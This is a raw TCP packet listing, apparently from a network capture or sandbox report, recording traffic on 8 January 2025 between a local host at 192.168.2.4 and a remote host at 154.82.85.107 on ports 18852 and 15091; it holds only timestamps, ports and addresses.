                                                                                  Jan 8, 2025 07:15:30.996561050 CET4973918852192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:30.996644020 CET1885249739154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:30.996655941 CET1885249739154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:30.996666908 CET1885249739154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:30.996679068 CET1885249739154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:30.996700048 CET4973918852192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:30.996712923 CET4973918852192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:30.997673988 CET1885249739154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:30.998138905 CET1885249739154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:30.998150110 CET1885249739154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:30.998161077 CET1885249739154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:30.998171091 CET1885249739154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:30.998191118 CET4973918852192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:30.998219013 CET4973918852192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:30.998285055 CET1885249739154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:30.998297930 CET1885249739154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:30.998308897 CET1885249739154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:30.998347998 CET4973918852192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:30.998367071 CET4973918852192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:30.998440027 CET1885249739154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:30.998611927 CET1885249739154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:30.998621941 CET1885249739154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:30.998634100 CET1885249739154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:30.998655081 CET4973918852192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:30.998694897 CET4973918852192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:33.039345026 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:33.044188023 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:33.044261932 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:33.044543982 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:33.049335003 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:33.935992956 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:33.936439991 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:33.941251040 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:33.941272020 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:33.941281080 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.254529953 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.254551888 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.254564047 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.254575968 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.254622936 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.254656076 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.254659891 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.254672050 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.254683018 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.254702091 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.254725933 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.254746914 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.254779100 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.254791021 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.254801989 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.254842997 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.259716034 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.259727955 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.259738922 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.259773016 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.259810925 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.479326963 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.479361057 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.479373932 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.479408979 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.479418993 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.479453087 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.479463100 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.479465961 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.479511023 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.479572058 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.479583979 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.479598999 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.479629040 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.480587959 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.480598927 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.480611086 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.480635881 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.480648994 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.480776072 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.480788946 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.480799913 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.480824947 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.481590033 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.481601954 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.481612921 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.481642008 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.481654882 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.481767893 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.481780052 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.481791019 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.481817961 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.482244015 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.482264042 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.482305050 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.482326984 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.482376099 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.704380989 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.704416990 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.704431057 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.704479933 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.704521894 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.704534054 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.704545021 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.704556942 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.704574108 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.704603910 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.704802036 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.704850912 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.704854012 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.704866886 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.704929113 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.705019951 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.705032110 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.705044031 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.705080032 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.705552101 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.705571890 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.705585003 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.705600977 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.705630064 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.705728054 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.705740929 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.705750942 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.705764055 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.705776930 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.705820084 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.706485033 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.706496000 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.706509113 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.706545115 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.706938028 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.706949949 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.706960917 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.706990957 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.707024097 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.707046986 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.708884954 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.708897114 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.708909035 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.708921909 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.708933115 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.708940029 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.708945036 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.708970070 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.749438047 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.929138899 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929158926 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929172993 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929188013 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929229975 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929244995 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929253101 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.929300070 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929313898 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.929373980 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929429054 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.929523945 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929569960 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929583073 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929641008 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929915905 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929934978 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.929935932 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929950953 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929992914 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.930016994 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.930270910 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.930284023 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.930294991 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.930296898 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.930329084 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.930417061 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.930428982 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.930439949 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.930452108 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.930469990 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.930499077 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.930561066 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.930610895 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.930619001 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.931195974 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.931251049 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.931262970 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.931303024 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.931370020 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.931380987 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.931392908 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.931423903 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.931492090 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.931504011 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.931516886 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.931550980 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.931577921 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.932147026 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.932223082 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.932235003 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.932279110 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.932286978 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.932374954 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.932375908 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.932387114 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.932399035 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.932413101 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.932440042 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.932460070 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.932535887 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.933201075 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.933212042 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.933224916 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.933259964 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.933281898 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.933336973 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.933347940 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.933360100 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.933372974 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.933388948 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.933417082 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.933500051 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.933512926 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.933579922 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.934124947 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.934137106 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.934179068 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.154231071 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.154266119 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.154279947 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.154350996 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.154390097 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.154402971 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.154413939 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.154431105 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.154448032 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.154468060 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.154551983 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.154563904 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.154575109 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.154586077 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.154597044 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.154601097 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.154625893 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.154640913 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.154814959 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.154828072 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.154866934 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.154887915 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.154900074 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.154915094 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.154947996 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.155122042 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.155133963 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.155143976 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.155155897 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.155167103 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.155179024 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.155297041 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.155337095 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.155349016 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.155391932 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.155392885 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.155405045 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.155416965 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.155428886 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.155441046 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.155447960 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.155483961 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.155494928 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.155721903 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.155772924 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.155785084 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.155817986 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.155848980 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.155889034 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.155942917 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.155956030 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.155966997 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.155977964 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.156006098 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.156033039 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.156107903 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.156167030 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.156176090 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.156215906 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.156419992 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.156450987 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.156461954 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.156512022 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.156524897 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.156559944 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.156573057 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.156588078 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.156616926 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.156734943 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.156747103 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.156759024 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:35.156785011 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:35.156845093 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:36.203512907 CET4974115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:36.208368063 CET1509149741154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:36.208441973 CET4974115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:38.171430111 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:41.706633091 CET4974115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:41.711718082 CET1509149741154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:41.711739063 CET1509149741154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:41.711777925 CET1509149741154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:41.711791039 CET1509149741154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:42.029750109 CET1509149741154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:42.030133963 CET4974115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:42.035003901 CET1509149741154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:53.671526909 CET4974115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:53.676482916 CET1509149741154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:53.990813971 CET1509149741154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:54.030709982 CET4974115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:54.131223917 CET4974115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:54.136118889 CET1509149741154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:16:10.030847073 CET4974115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:16:10.035640955 CET1509149741154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:16:10.350140095 CET1509149741154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:16:10.405756950 CET4974115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:16:10.438922882 CET4974115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:16:10.443804979 CET1509149741154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:16:27.843343973 CET4974115091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:16:27.848217964 CET1509149741154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:16:28.162419081 CET1509149741154.82.85.107192.168.2.4
